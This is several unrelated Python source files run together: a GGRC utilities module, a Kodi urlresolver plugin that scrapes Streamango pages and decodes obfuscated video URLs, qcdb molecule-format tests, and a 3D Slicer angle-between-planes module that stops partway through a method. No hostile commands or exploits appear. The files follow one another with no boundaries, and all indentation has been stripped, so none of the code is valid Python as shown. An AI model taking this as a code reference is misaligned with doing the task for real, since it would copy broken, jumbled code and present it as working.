# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
import datetime
import json
import re
import sqlalchemy
import sys
from flask import request
from ggrc.settings import CUSTOM_URL_ROOT
from ggrc.utils import benchmarks
class GrcEncoder(json.JSONEncoder):
"""Custom JSON Encoder to handle datetime objects and sets
from:
`http://stackoverflow.com/questions/12122007/python-json-encoder-to-support-datetime`_
also consider:
`http://hg.tryton.org/2.4/trytond/file/ade5432ac476/trytond/protocols/jsonrpc.py#l53`_
"""
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
elif isinstance(obj, datetime.date):
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return (datetime.datetime.min + obj).time().isoformat()
elif isinstance(obj, set):
return list(obj)
else:
return super(GrcEncoder, self).default(obj)
def as_json(obj, **kwargs):
return json.dumps(obj, cls=GrcEncoder, **kwargs)
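# Illustrative usage (not part of the original module): GrcEncoder lets
# json.dumps handle values the stock encoder rejects, e.g.
#   as_json({"on": datetime.date(2016, 1, 2), "tags": {"x"}})
#   -> '{"on": "2016-01-02", "tags": ["x"]}'  (key/element order may vary)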
def service_for(obj):
module = sys.modules['ggrc.services']
if type(obj) is str or type(obj) is unicode: # noqa
model_type = obj
else:
model_type = obj.__class__.__name__
return getattr(module, model_type, None)
def url_for(obj, id=None):
service = service_for(obj)
if service is None:
return None
if not hasattr(service, 'url_for'):
return None
if id is not None:
return service.url_for(id=id)
return service.url_for(obj)
def view_service_for(obj):
module = sys.modules['ggrc.views']
if type(obj) is str or type(obj) is unicode: # noqa
model_type = obj
else:
model_type = obj.__class__.__name__
return getattr(module, model_type, None)
def view_url_for(obj, id=None):
service = view_service_for(obj)
if service is None:
return None
if not hasattr(service, 'url_for'):
return None
if id is not None:
return service.url_for(id=id)
return service.url_for(obj)
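# Illustrative note: url_for/view_url_for resolve an object (or a model name
# given as a string) to the service registered under that class name on
# ggrc.services / ggrc.views and delegate to that service's own url_for;
# both return None when no matching service exists.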
def encoded_dict(in_dict):
# http://stackoverflow.com/questions/6480723/urllib-urlencode-doesn't-like-unicode-values-how-about-this-workaround
out_dict = {}
for k, v in in_dict.iteritems():
if isinstance(v, unicode): # noqa
v = v.encode('utf8')
elif isinstance(v, str):
# Already a byte string; just validate that it decodes as UTF-8.
v.decode('utf8')
out_dict[k] = v
return out_dict
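# Example (Python 2, illustrative): unicode values are re-encoded as UTF-8
# byte strings so the dict is safe for urllib.urlencode:
#   encoded_dict({u'name': u'caf\xe9'}) -> {u'name': 'caf\xc3\xa9'}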
def merge_dict(destination, source, path=None):
"""merges source into destination"""
if path is None:
path = []
for key in source:
if key in destination:
if isinstance(destination[key], dict) and isinstance(source[key], dict):
merge_dict(destination[key], source[key], path + [str(key)])
elif destination[key] == source[key]:
pass # same leaf value
else:
raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))
else:
destination[key] = source[key]
return destination
def merge_dicts(*args):
result = {}
for arg in args:
result = merge_dict(result, arg)
return result
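# Illustrative semantics (not in the original source): nested dicts merge
# recursively, identical leaves are kept, conflicting leaves raise.
#   merge_dicts({"a": {"b": 1}}, {"a": {"c": 2}}) -> {"a": {"b": 1, "c": 2}}
#   merge_dicts({"a": 1}, {"a": 2})               -> Exception: Conflict at a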
def get_url_root():
if CUSTOM_URL_ROOT is not None:
return CUSTOM_URL_ROOT
return request.url_root
def get_mapping_rules():
""" Get mappings rules as defined in business_object.js
Special cases:
Aduit has direct mapping to Program with program_id
Request has a direct mapping to Audit with audit_id
Section has a direct mapping to Standard/Regulation/Poicy with directive_id
Anything can be mapped to a request, frotent show audit insted
"""
def filter_camelcase(object_list):
""" Remove all lower-case items, since real object names are CamelCase """
return {item for item in object_list if item != item.lower()}
# these rules are copy pasted from
# src/ggrc/assets/javascripts/apps/base_widgets.js line: 9
# WARNING ########################################################
# Manually added Risks and threats to the list from base_widgets #
##################################################################
# TODO: Read these rules from different modules and combine them here.
business_object_rules = {
"AccessGroup": "Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Audit": "AccessGroup Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor", # noqa
# "AssessmentTemplate": "Audit", # Uncomment this line when we add support for assessment templates in exports # noqa
"Clause": "AccessGroup Audit Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Contract": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Control": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Assessment": "AccessGroup Audit Clause Contract Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"DataAsset": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Facility": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Issue": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Market": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Objective": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"OrgGroup": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Person": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Policy": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Process": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Product": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Program": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Project": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Regulation": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Request": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Section": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Standard": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"System": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Vendor": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Risk": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Threat CycleTaskGroupObjectTask", # noqa
"Threat": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk CycleTaskGroupObjectTask", # noqa
"CycleTaskGroupObjectTask": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat", # noqa
}
split_rules = {k: v.split() for k, v in business_object_rules.items()}
filtered_rules = {k: filter_camelcase(v) for k, v in split_rules.items()}
return filtered_rules
def _prefix_camelcase(name, prefix):
name = name[:1].lower() + name[1:]
return re.sub(r'[A-Z]', lambda pat: prefix + pat.group(0).lower(), name)
def underscore_from_camelcase(name):
return _prefix_camelcase(name, "_")
def title_from_camelcase(name):
return _prefix_camelcase(name, " ")
def get_fuzzy_date(delta_date):
"""Get a human readable date string.
This function returns a human friendly time delta compared to today.
Args:
delta_date (date): Date that we want to show to the user.
Returns:
string: A human readable representation of the date delta.
Examples:
>>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(2))
'in 2 days'
>>> get_fuzzy_date(datetime.date.today())
'today'
>>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(-1))
'1 day ago'
"""
if not delta_date:
return ""
if isinstance(delta_date, datetime.datetime):
delta_date = delta_date.date()
delta = delta_date - datetime.date.today()
if delta.days < 0:
days = abs(delta.days)
return "{} day{} ago".format(days, "s" if days > 1 else "")
if delta.days == 0:
return "today"
# TODO: use format_timedelta from babel package.
return "in {} day{}".format(delta.days, "s" if delta.days > 1 else "")
# pylint: disable=too-few-public-methods
# because this is a small context manager
class QueryCounter(object):
"""Context manager for counting sqlalchemy database queries.
Usage:
with QueryCounter() as counter:
...  # execute some queries here
query_count = counter.get
"""
def __init__(self):
self.queries = []
def after_cursor_execute(*args):
# args: (conn, cursor, statement, parameters, context, executemany)
self.queries.append(args[2])
self.listener = after_cursor_execute
def __enter__(self):
sqlalchemy.event.listen(sqlalchemy.engine.Engine,
"after_cursor_execute",
self.listener)
return self
def __exit__(self, *_):
sqlalchemy.event.remove(sqlalchemy.engine.Engine,
"after_cursor_execute",
self.listener)
@property
def get(self):
return len(self.queries)
benchmark = benchmarks.get_benchmark()
with_nop = benchmarks.WithNop
"""
urlresolver Kodi Addon
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from lib import helpers
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class StreamangoResolver(UrlResolver):
name = "streamango"
domains = ['streamango.com', "streamcherry.com"]
pattern = r'(?://|\.)(stream(?:ango|cherry)\.com)/(?:v/d|f|embed)/([0-9a-zA-Z]+)'
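# Illustrative match: for 'https://streamango.com/embed/abcd1234' the pattern
# captures host='streamango.com' and media_id='abcd1234'.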
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.RAND_UA}
html = self.net.http_GET(web_url, headers=headers).content
if html:
encoded = re.search(r'''srces\.push\({type:"video/mp4",src:\w+\('([^']+)',(\d+)''', html)
if encoded:
source = self.decode(encoded.group(1), int(encoded.group(2)))
if source:
source = "http:%s" % source if source.startswith("//") else source
source = source.split("/")
if not source[-1].isdigit():
source[-1] = re.sub(r'[^\d]', '', source[-1])
source = "/".join(source)
headers.update({'Referer': web_url})
return source + helpers.append_headers(headers)
raise ResolverError("Unable to locate video")
def decode(self, encoded, code):
_0x59b81a = ""
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
k = k[::-1]
count = 0
for index in range(0, len(encoded) - 1):
while count <= len(encoded) - 1:
_0x4a2f3a = k.index(encoded[count])
count += 1
_0x29d5bf = k.index(encoded[count])
count += 1
_0x3b6833 = k.index(encoded[count])
count += 1
_0x426d70 = k.index(encoded[count])
count += 1
_0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))
_0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))
_0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70
_0x2e4782 = _0x2e4782 ^ code
_0x59b81a = str(_0x59b81a) + chr(_0x2e4782)
if _0x3b6833 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x2c0540)
if _0x426d70 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)
return _0x59b81a
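# Note (added for clarity): decode() is a transliterated JavaScript routine,
# essentially a base64 decode over a reversed alphabet in which the first
# byte of every decoded 3-byte group is XOR-ed with `code`.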
def get_url(self, host, media_id):
return self._default_get_url(host, media_id, 'http://{host}/embed/{media_id}')
import sys
import pytest
from utils import *
from addons import *
subject1 = """
3 au
Co 0 0 0
H 2 0 0
h_OTher -2 0 0
"""
ans1_au = """3 au
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H 2.000000000000 0.000000000000 0.000000000000
H -2.000000000000 -0.000000000000 0.000000000000
"""
ans1_ang = """3
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H 1.058354421340 0.000000000000 0.000000000000
H -1.058354421340 -0.000000000000 0.000000000000
"""
ans1c_ang = """3
CoH2
59Co 0.00000000 0.00000000 0.00000000
1H 1.05835442 0.00000000 0.00000000
1H_other -1.05835442 -0.00000000 0.00000000
"""
#subject2 = """
#Co 0 0 0
#units au
#no_reorient
#--
#@H 2 0 0
#h_OTher -2 0 0
#"""
#
#ans2_au = """3 au
#
#Co 0.000000000000 0.000000000000 0.000000000000
#@H 2.000000000000 0.000000000000 0.000000000000
#H -2.000000000000 0.000000000000 0.000000000000"""
#
#ans2_ang = """3
#
#Co 0.000000000000 0.000000000000 0.000000000000
#Gh(1) 1.058354417180 0.000000000000 0.000000000000
#H -1.058354417180 0.000000000000 0.000000000000"""
#
#ans2c_ang = """2
#
#Co 0.000000000000 0.000000000000 0.000000000000
#H -1.058354417180 0.000000000000 0.000000000000"""
subject2 = """
Co 0 0 0
no_reorient
--
@H 1.05835442134 0 0
h_OTher -1.05835442134 0 0
"""
ans2_au = """3 au
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
@H 2.000000000000 0.000000000000 0.000000000000
H -2.000000000000 0.000000000000 0.000000000000
"""
ans2_ang = """3
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
Gh(1) 1.058354421340 0.000000000000 0.000000000000
H -1.058354421340 0.000000000000 0.000000000000
"""
ans2c_ang = """2
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H -1.058354421340 0.000000000000 0.000000000000
"""
def test_toxyz_1a():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans1_au, xyz, sys._getframe().f_code.co_name)
def test_toxyz_1b():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom')
assert compare_strings(ans1_ang, xyz, sys._getframe().f_code.co_name)
def test_toxyz_1c():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', prec=8, atom_format='{elea}{elem}{elbl}')
print(xyz)
assert compare_strings(ans1c_ang, xyz, sys._getframe().f_code.co_name)
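# Note on test_toxyz_1c above: atom_format='{elea}{elem}{elbl}' appears to
# expand to mass number + element symbol + user label (compare ans1c_ang:
# '59Co', '1H_other'), while prec=8 sets the coordinate precision.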
def test_toxyz_2a():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
def test_toxyz_2b():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='Gh({elez})')
assert compare_strings(ans2_ang, xyz, sys._getframe().f_code.co_name)
def test_toxyz_2c():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='')
assert compare_strings(ans2c_ang, xyz, sys._getframe().f_code.co_name)
@using_psi4_molrec
def test_toxyz_3a():
import psi4
subject = subject2
mol = psi4.core.Molecule.from_string(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
from __main__ import vtk, qt, ctk, slicer
import numpy
from math import *
from slicer.ScriptedLoadableModule import *
import os
import pickle
import time
from sys import maxint
MAXINT = maxint
from slicer.util import VTKObservationMixin
class ModelAddedClass(VTKObservationMixin):
def __init__(self, anglePlanes):
VTKObservationMixin.__init__(self)
self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeAddedEvent, self.nodeAddedCallback)
self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeRemovedEvent, self.nodeRemovedCallback)
self.anglePlanes = anglePlanes
@vtk.calldata_type(vtk.VTK_OBJECT)
def nodeAddedCallback(self, caller, eventId, callData):
if isinstance(callData, slicer.vtkMRMLModelNode):
self.addObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified)
@vtk.calldata_type(vtk.VTK_OBJECT)
def nodeRemovedCallback(self, caller, eventId, callData):
if isinstance(callData, slicer.vtkMRMLModelNode):
self.removeObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified)
self.anglePlanes.removeModelPointLocator(callData.GetName())
def onModelNodePolyDataModified(self, caller, eventId):
self.anglePlanes.addModelPointLocator(caller.GetName(), caller.GetPolyData())
class AnglePlanes(ScriptedLoadableModule):
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
parent.title = "Angle Planes"
parent.categories = ["Shape Analysis"]
parent.dependencies = []
parent.contributors = ["Julia Lopinto", "Juan Carlos Prieto"]
parent.helpText = """
This module is used to calculate the angle between two planes, using their normals.
The user can either choose two of the planes already provided by Slicer
or define a plane from landmarks (at least 3 landmarks).
Planes can also be saved and reused with other models.
This is an alpha version of the module.
It can't be used for the moment.
"""
parent.acknowledgementText = """
This work was supported by the National
Institutes of Dental and Craniofacial Research
and Biomedical Imaging and Bioengineering of
the National Institutes of Health under Award
Number R01DE024450.
"""
self.parent = parent
class AnglePlanesWidget(ScriptedLoadableModuleWidget):
def setup(self):
ScriptedLoadableModuleWidget.setup(self)
self.moduleName = "AnglePlanes"
self.i = 0
self.logic = AnglePlanesLogic()
self.planeControlsId = 0
self.planeControlsDictionary = {}
self.midPointFiducialDictionaryID = {}
# self.logic.initializePlane()
self.n_vector = numpy.matrix([[0], [0], [1], [1]])
self.interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton")
#Definition of the 2 planes
# Collapsible button -- Scene Description
self.loadCollapsibleButton = ctk.ctkCollapsibleButton()
self.loadCollapsibleButton.text = "Scene"
self.layout.addWidget(self.loadCollapsibleButton)
# Layout within the laplace collapsible button
self.loadFormLayout = qt.QFormLayout(self.loadCollapsibleButton)
#--------------------------- List of Models --------------------------#
treeView = slicer.qMRMLTreeView()
treeView.setMRMLScene(slicer.app.mrmlScene())
treeView.setSceneModelType('Displayable')
treeView.sceneModel().setHorizontalHeaderLabels(["Models"])
treeView.sortFilterProxyModel().nodeTypes = ['vtkMRMLModelNode']
header = treeView.header()
header.setResizeMode(0, qt.QHeaderView.Stretch)
header.setVisible(True)
self.loadFormLayout.addWidget(treeView)
# numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
# for i in range (3,numNodes):
# self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
# print self.elements.GetName()
# Add vertical spacer
self.layout.addStretch(1)
#------------------------ Compute Bounding Box ----------------------#
buttonFrameBox = qt.QFrame(self.parent)
buttonFrameBox.setLayout(qt.QHBoxLayout())
self.loadFormLayout.addWidget(buttonFrameBox)
self.computeBox = qt.QPushButton("Compute Bounding Box around all models")
buttonFrameBox.layout().addWidget(self.computeBox)
self.computeBox.connect('clicked()', self.onComputeBox)
self.CollapsibleButton = ctk.ctkCollapsibleButton()
self.CollapsibleButton.text = "Manage planes"
self.layout.addWidget(self.CollapsibleButton)
self.managePlanesFormLayout = qt.QFormLayout(self.CollapsibleButton)
self.CollapsibleButton.checked = True
# Add planes and manage landmark addition to each plane
addNewPlaneLayout = qt.QHBoxLayout()
addPlaneLabel = qt.QLabel('Add new plane')
addPlaneButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ")
addPlaneButton.setFixedSize(50,25)
addPlaneButton.connect('clicked()', self.addNewPlane)
addPlaneButton.setEnabled(True)
addNewPlaneLayout.addWidget(addPlaneLabel)
addNewPlaneLayout.addWidget(addPlaneButton)
self.managePlanesFormLayout.addRow(addNewPlaneLayout)
# ----------------- Compute Mid Point -------------
self.midPointGroupBox = ctk.ctkCollapsibleButton()
self.midPointGroupBox.setText('Define middle point between two landmarks')
self.midPointGroupBox.collapsed = True
self.parent.layout().addWidget(self.midPointGroupBox)
self.landmarkComboBox1MidPoint = qt.QComboBox()
self.landmarkComboBox2MidPoint = qt.QComboBox()
landmark1Layout = qt.QFormLayout()
landmark1Layout.addRow('Landmark A: ', self.landmarkComboBox1MidPoint)
landmark1Layout.addRow('Landmark B: ', self.landmarkComboBox2MidPoint)
self.defineMiddlePointButton = qt.QPushButton(' Add middle point ')
# self.midPointOnSurfaceCheckBox = qt.QCheckBox('On Surface')
# self.midPointOnSurfaceCheckBox.setChecked(False)
exportLayout_1 = qt.QFormLayout()
# exportLayout_1.addRow(self.midPointOnSurfaceCheckBox, self.defineMiddlePointButton)
exportLayout_1.addRow(self.defineMiddlePointButton)
self.midPointLayout = qt.QVBoxLayout()
self.midPointLayout.addLayout(landmark1Layout)
self.midPointLayout.addLayout(exportLayout_1)
self.midPointGroupBox.setLayout(self.midPointLayout)
self.defineMiddlePointButton.connect('clicked()', self.onAddMidPoint)
# self.landmarkComboBox1MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint)
# self.landmarkComboBox2MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint)
# -------- Calculate angles between planes ------------
self.CollapsibleButtonPlane = ctk.ctkCollapsibleButton()
self.CollapsibleButtonPlane.text = "Choose planes"
self.layout.addWidget(self.CollapsibleButtonPlane)
sampleFormLayoutPlane = qt.QFormLayout(self.CollapsibleButtonPlane)
self.planeComboBox1 = qt.QComboBox()
self.planeComboBox1.addItem("red")
self.planeComboBox1.addItem("yellow")
self.planeComboBox1.addItem("green")
sampleFormLayoutPlane.addRow("Select plane 1: ", self.planeComboBox1)
self.planeComboBox2 = qt.QComboBox()
self.planeComboBox2.addItem("red")
self.planeComboBox2.addItem("yellow")
self.planeComboBox2.addItem("green")
sampleFormLayoutPlane.addRow("Select plane 2: ", self.planeComboBox2)
self.CollapsibleButton2 = ctk.ctkCollapsibleButton()
self.CollapsibleButton2.text = "Results"
self.layout.addWidget(self.CollapsibleButton2)
sampleFormLayout2 = qt.QFormLayout(self.CollapsibleButton2)
self.results = qt.QPushButton("Results")
self.results.connect('clicked()', self.angleValue)
sampleFormLayout2.addWidget(self.results)
label_RL = qt.QLabel("R-L View")
self.getAngle_RL = qt.QLabel("0")
label_SI = qt.QLabel("S-I View")
self.getAngle_SI = qt.QLabel("0")
label_AP = qt.QLabel("A-P View")
self.getAngle_AP = qt.QLabel("0")
self.getAngle_RL_comp = qt.QLabel("0")
self.getAngle_SI_comp = qt.QLabel("0")
self.getAngle_AP_comp = qt.QLabel("0")
tableResult = qt.QTableWidget(3, 3)
tableResult.setColumnCount(3)
tableResult.setHorizontalHeaderLabels([' View ', 'Angle', 'Complementary angle'])
tableResult.setColumnWidth(0, 80)
tableResult.setColumnWidth(1, 80)
tableResult.setColumnWidth(2, 180)
tableResult.setRowCount(1)
tableResult.setCellWidget(0, 0, label_RL)
tableResult.setCellWidget(0, 1, self.getAngle_RL)
tableResult.setCellWidget(0, 2, self.getAngle_RL_comp)
tableResult.setRowCount(2)
tableResult.setCellWidget(1, 0, label_SI)
tableResult.setCellWidget(1, 1, self.getAngle_SI)
tableResult.setCellWidget(1, 2, self.getAngle_SI_comp)
tableResult.setRowCount(3)
tableResult.setCellWidget(2, 0, label_AP)
tableResult.setCellWidget(2, 1, self.getAngle_AP)
tableResult.setCellWidget(2, 2, self.getAngle_AP_comp)
# Add vertical spacer
self.layout.addStretch(1)
sampleFormLayout2.addWidget(tableResult)
self.CollapsibleButton3 = ctk.ctkCollapsibleButton()
self.CollapsibleButton3.text = "Save"
self.layout.addWidget(self.CollapsibleButton3)
sampleFormLayout3 = qt.QFormLayout(self.CollapsibleButton3)
self.CollapsibleButton3.checked = False
buttonFrame = qt.QFrame(self.parent)
buttonFrame.setLayout(qt.QVBoxLayout())
sampleFormLayout3.addWidget(buttonFrame)
#-------------------------------- PLANES --------------------------------#
save_plane = qt.QLabel("Save the planes you create as a txt file.")
buttonFrame.layout().addWidget(save_plane)
save = qt.QPushButton("Save plane")
buttonFrame.layout().addWidget(save)
# load_plane = qt.QLabel("Load the file with the plane you saved.")
# buttonFrame.layout().addWidget(load_plane)
read = qt.QPushButton("Load plane")
buttonFrame.layout().addWidget(read)
#-------------------------------- CONNECTIONS --------------------------------#
self.planeComboBox1.connect('currentIndexChanged(QString)', self.valueComboBox)
self.planeComboBox2.connect('currentIndexChanged(QString)', self.valueComboBox)
save.connect('clicked(bool)', self.onSavePlanes)
read.connect('clicked(bool)', self.onReadPlanes)
slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)
self.pointLocatorDictionary = {}
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
for i in range (3, numNodes):
modelnode = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
self.addModelPointLocator(modelnode.GetName(), modelnode.GetPolyData())
ModelAddedClass(self)
def removeModelPointLocator(self, name):
if name in self.pointLocatorDictionary:
print("Removing point locator {0}".format(name))
del self.pointLocatorDictionary[name]
def addModelPointLocator(self, name, polydata):
if name not in self.pointLocatorDictionary:
print("Adding point locator: {0}".format(name))
pointLocator = vtk.vtkPointLocator()
pointLocator.SetDataSet(polydata)
pointLocator.AutomaticOn()
pointLocator.BuildLocator()
self.pointLocatorDictionary[name] = pointLocator
def addNewPlane(self, keyLoad = -1):
if keyLoad != -1:
self.planeControlsId = keyLoad
else:
self.planeControlsId += 1
planeControls = AnglePlanesWidgetPlaneControl(self, self.planeControlsId, self.pointLocatorDictionary)
self.managePlanesFormLayout.addRow(planeControls)
key = "Plane " + str(self.planeControlsId)
self.planeControlsDictionary[key] = planeControls
self.planeComboBox1.addItem(key)
self.planeComboBox2.addItem(key)
def onComputeBox(self):
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
bound = [MAXINT, -MAXINT, MAXINT, -MAXINT, MAXINT, -MAXINT]
for i in range (3,numNodes):
self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
node = slicer.util.getNode(self.elements.GetName())
polydata = node.GetPolyData()
tempbound = polydata.GetBounds()
bound[0] = min(bound[0], tempbound[0])
bound[2] = min(bound[2], tempbound[2])
bound[4] = min(bound[4], tempbound[4])
bound[1] = max(bound[1], tempbound[1])
bound[3] = max(bound[3], tempbound[3])
bound[5] = max(bound[5], tempbound[5])
#--------------------------- Box around the model --------------------------#
# print "bound", bound
dimX = bound[1]-bound[0]
dimY = bound[3]-bound[2]
dimZ = bound[5]-bound[4]
# print "dimension X :", dimX
# print "dimension Y :", dimY
# print "dimension Z :", dimZ
dimX = dimX + 10
dimY = dimY + 10
dimZ = dimZ + 10
sampleVolumeNode = slicer.vtkMRMLScalarVolumeNode()
sampleVolumeNode = slicer.mrmlScene.AddNode(sampleVolumeNode)
imageData = vtk.vtkImageData()
# Do NOT set the spacing and the origin of imageData (vtkImageData)
# The spacing and the origin should only be set in the vtkMRMLScalarVolumeNode!!!!!!
imageData.SetDimensions(int(dimX), int(dimY), int(dimZ))
imageData.AllocateScalars(vtk.VTK_UNSIGNED_CHAR, 1)
extent = imageData.GetExtent()
for x in xrange(extent[0], extent[1]+1):
for y in xrange(extent[2], extent[3]+1):
for z in xrange(extent[4], extent[5]+1):
imageData.SetScalarComponentFromDouble(x,y,z,0,0)
sampleVolumeNode.SetSpacing(1, 1, 1)
sampleVolumeNode.SetOrigin(bound[0], bound[2], bound[4])
sampleVolumeNode.SetName("Empty_volume")
